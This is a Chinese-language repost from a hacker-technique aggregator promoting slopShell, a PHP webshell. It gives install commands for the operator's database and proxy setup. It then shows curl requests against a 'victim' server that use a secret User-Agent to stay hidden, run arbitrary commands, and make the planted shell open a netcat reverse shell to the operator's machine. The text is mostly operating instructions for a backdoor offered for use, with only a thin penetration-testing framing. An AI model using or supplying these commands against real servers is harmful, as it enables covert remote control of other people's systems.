记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

slopShell:强大的PHP Webshell

2021-06-16 16:42

关于slopShell

slopShell是一款功能强大的PHP Webshell,有了它,你就不需要再用到其他Webshell了。

为了让这个shell正常工作,广大研究人员只需要做两件事情,一是能够将php文件发送给目标用户,二是能够向这个Webshell发送HTTP请求

工具安装

首先,广大研究人员需要运行一台由自己控制的pgsql服务器,然后根据自己的操作系统类型选择对应的安装命令:

Debian

apt install -y postgresql php php-pear && python -m pip install proxybroker --user

RHEL系统

dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

一旦这些设置正确并且可以确认它们正在运行,我建议广大研究人员运行命令“pg_ctl”来创建数据库,并实现数据库的初始化和启动,以此确保所有数据库查询都可以正常工作。

工具交互

首先,您需要选择一个有效的User-Agent来使用,你可以把它看成是第一层保护,以防您的webshell被除您之外的任何人意外地发现。我这里选择的是“sp/1.1”,因为它是一个非典型的User-Agent。如果设置不当的话,可能会导致渗透测试过程中出现问题,或者导致脚本和访问请求被屏蔽。对于Windows版本的话,我没有添加过多内容,因为本人不太喜欢Windows开发。

下面给出的是如何将此webshell与curl一起使用的示例:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

或者,执行下列自定义命令:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v

或者,可以尝试跟你自己的设备建立一个反向Shell:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v

工具使用样例

在浏览器中,在不使用正常User-Agent字符串的情况下发送请求(第一层认证):

在命令行终端窗口中,使用curl命令以及-vH "User-Agent: sp1.1"选项执行:


项目地址

slopShell:

https://github.com/oldkingcone/slopShell


知识来源: https://mp.weixin.qq.com/s?__biz=MzkzMjIwMDY4Nw==&mid=2247484917&idx=1&sn=6eca650cd7992b49dcdb6732437284cc

阅读:61287 | 评论:0 | 标签:PHP shell

想收藏或者和大家分享这篇好文章→复制链接地址

“slopShell:强大的PHP Webshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云